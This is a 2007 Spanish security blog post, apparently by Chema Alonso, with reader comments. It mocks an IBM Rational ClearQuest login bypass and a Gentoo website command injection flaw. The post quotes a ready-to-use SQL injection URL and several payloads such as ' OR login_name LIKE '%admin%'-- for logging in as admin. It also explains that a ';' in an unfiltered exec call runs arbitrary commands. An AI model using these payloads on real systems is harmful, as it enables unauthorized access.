sábado, agosto 18, 2007

Qué Gente!

Hoy es sábado y no me apetece ser muy malo ni tener mucha guerra, pero...un poco sí.

Revisando los últimos exploits me encuentro con este:

IBM Rational ClearQuest Web Login Bypass (SQL Injection)

SAMPLE URL:
===========

http://SERVERNAMEHERE/cqweb/main?command=GenerateMainFrame&ratl_userdb=DATABASENAMEHERE,&test=&clientServerAddress=http://SERVERNAMEHERE/cqweb/login&username='INJECTIONGOESHERE&password=PASSWORDHERE&schema=SCHEMEAHERE&userDb=DATABASENAMEHERE

Log in as "admin":
==================


' OR login_name LIKE '%admin%'--

(other variations work as well)
' OR login_name LIKE 'admin%'--
' OR LOWER(login_name) LIKE '%admin%'--
' OR LOWER(login_name) LIKE 'admin%'--
etc...use your imagination...


Tras la cagada de "Como comerse una comilla" siempre piensas, que esa es un buena cagada, pero que IBM se coma una comilla en el campo USERNAME de un formulario de login indica el número de pruebas que le han hecho a este producto de seguridad: EXACTEMANTE Cero mil cero cientas cero cero o dicho de otra forma, en binario 0000000.

La otra cagadita del día, ha sido la de Gentoo, que me ha encantado, en este caso el Bug#: 187971

Gentoo Website Command Injection Issue

El problema está en que no está bien filtrado y se hace una llamada a exec por lo que basta con poner un ";" y ejecutar cualquier otra instrucción en el sistema operativo. Una Injección de comandos remota.

Cuando esto se hace público rápidamente el progrmador busca una solución y se la postea a los colegas porque

"Sorry I am out of town and don't have access to Gentoo servers"

pero se lo curra y ofrece una solución:

for the resolution, the solution should be something more to the effect:

[!--#exec cmd="export QUERY_STRING;./similar.py" --]


No obstante, luego recapacita y se da cuenta de "ups!, yo creo que esto lo he hecho más veces!". Y vuelve a postear:

Oh, forgot to mention... they /similar page is not the only one where "exec
cmd" is used. So this will have to be fixed in all occurrences. They're all
found in mksite.py though.


Al final, se optó por tirar abajo los servidores hasta que regresaran de las conferecias, y luego lo explicaron.

¿Serían conferencias sobre seguridad? ¿Auditoría de código? ¿Testing? ¿Planes de respaldo? ¿Gestión de CPD? ¿downtime?

15 comentarios:

Anónimo dijo...

No te apetece ser malo, pero es que te obligan... :-P

SLaYeR dijo...

Gran cagada de Gentoo... XD ese tío no se si encontrará mucho trabajo después de esto...

Ah chema! Si Batman no se quita sus mallas en fin de semana no veo por qué deberías hacerlo tu.... ;)

Anónimo dijo...

Hola Maligno. en el blog de Daniel Matey me he topado con esto:

http://www.zone-h.org/content/view/14780/31/

Mi abuelo diría que en todas partes cuecen habas.

Anónimo dijo...

Por cierto, Chema, que estoy esperando 2 cosas:
- que me contestes al mail que te envié hace un par de días, o al menos me digas si te ha llegado...
- que hables de la pila de parches de Microsoft que salió el martes pasado, que creo que había bastantes cosillas interesantes, ¿no? }:-)))) Creo que algún ISP se quedó sin ancho de banda esos días debido a esas actualizaciones. También aparecieron advisories de eeye et al. Parece que eran importantes... ¿o no? xDDD

:-*
-r

Chema Alonso dijo...

@penyaskito, ¿te das cuenta? No puedo descansar ni los fines de semana de agosto!

@slayer, seguro que sí. En el lado del bien son muy buenos. Además, el pobre estaba de conferencias y total, que la gente de gentoo se quede sin paquetes... ¿quién quiere actualizar el sistema? Na,na. Ya los sacarían de algún otro sitio.

@anónimo, ese es el post de Cómo Comerse una Comilla al que hago referencia en este post dónde yo recomendaba un castigo para el programador.

@romansoft, de la primera cosas, tengo que contestarte, pero voy un poco atascado en los mails, empezaré a darle brillo el lunes y espero el miercoles haber contestado a todos, incluyendo al tuyo. A ver si podemos ayudarte a conseguir un Windows XP Professional para tí o por el contrario te enseño a optimizar el Windows Vista! ;) De todas formas, con el portátil ese, el Windows 98 SE no es tan mala opción XD.

Respecto a lo de los parches, yo ya me he actualizado y mis servidores también, pero sí son 9 y había varias críticas. De eso no se salva nadie. Aquí en el lado del mal podríamos hablar sobre como el sistema de actulizaciones de Spectra actualiza mensualmente más de 500 millones de usuarios en todo el mundo, con un número de incidencias bajísimo.

Supongo que no podrían parar los servidores de SU (Spectra Update) mientras el programador venga de las conferencias....

Anónimo dijo...

Supongo que no podrían parar los servidores de SU (Spectra Update) mientras el programador venga de las conferencias...

jodó, cuanta maldad en tan pocas letras XDDD

con respecto a estos asuntillos que nos ocupan... ¿es normal que haya tanta actividad en agosto?

Chema Alonso dijo...

La verdad es que es un agosto atípico. ¡Qué estrés!

Anónimo dijo...

Vaya cagada del site-admin.

"Supongo que no podrían parar los servidores de SU (Spectra Update) mientras el programador venga de las conferencias...."

Buen dardo, lástima que apuntes mal... Esos servidores no se utilizan como repositorios de paquetes, es un simple website con información.

¿Otra vez pillado en offside? :D

Chema Alonso dijo...

Hola Bastian!

En primer lugar tuvieron que tirar:

archives.gentoo.org
packagestest.gentoo.org
scripts.gentoo.org
archivestest.gentoo.org
kiss.gentoo.org
packages.gentoo.org
stats.gentoo.org
survey.gentoo.org

Que desde el día 7 aún hoy no están levantados.

En segundo lugar los servidores de Spectra Update no solo son los repositorios de archivos. También están las apps de info.

¿offside? ¿otra vez?

Saludos!

Anónimo dijo...

@slayer, seguro que sí. En el lado del bien son muy buenos. Además, el pobre estaba de conferencias y total, que la gente de gentoo se quede sin paquetes... ¿quién quiere actualizar el sistema? Na,na. Ya los sacarían de algún otro sitio.

En cuanto a las actualizaciones del sistema no ha habido el mas minimo problema, o yo por lo menos no lo he tenido.

archives.gentoo.org no es desde donde te descargas las actualizaciones, simplemente es el listado de paquetes con su estado,cambios, etc.

Anónimo dijo...

perdona que de el coñazo, al que me referia de consulta de paquetes online es packages.gentoo.org no archives.gentoo.org. El resto la verdad que no los he usado nunca (no se ni pa que valen, sera cosa de mirarlos cuando este otravez online).

Chema Alonso dijo...

@opotonil, no das el coñazo, gracias por la info! ;)

Anónimo dijo...

SI pero el caso es levantar mierda, rectificalo en el post, :) Gracias

Chema Alonso dijo...

@anónimo,

que rectifique que? jajaja. Está perfecto!! ¿Qué te parece a tí que está mal?. De hecho, voy a hacer mucho más cachondeo de esto!!

Chema Alonso dijo...

Última hora, se confirma que los servidores de Gentoo no se han caido, siguen en el escritorio del tipo que está de conferencias!

Entrada destacada

10 maneras de sacarle el jugo a tu cuenta de @MyPublicInbox si eres un Perfil Público

Cuando doy una charla a algún amigo, conocido, o a un grupo de personas que quieren conocer MyPublicInbox , siempre se acaban sorprendiendo ...

Entradas populares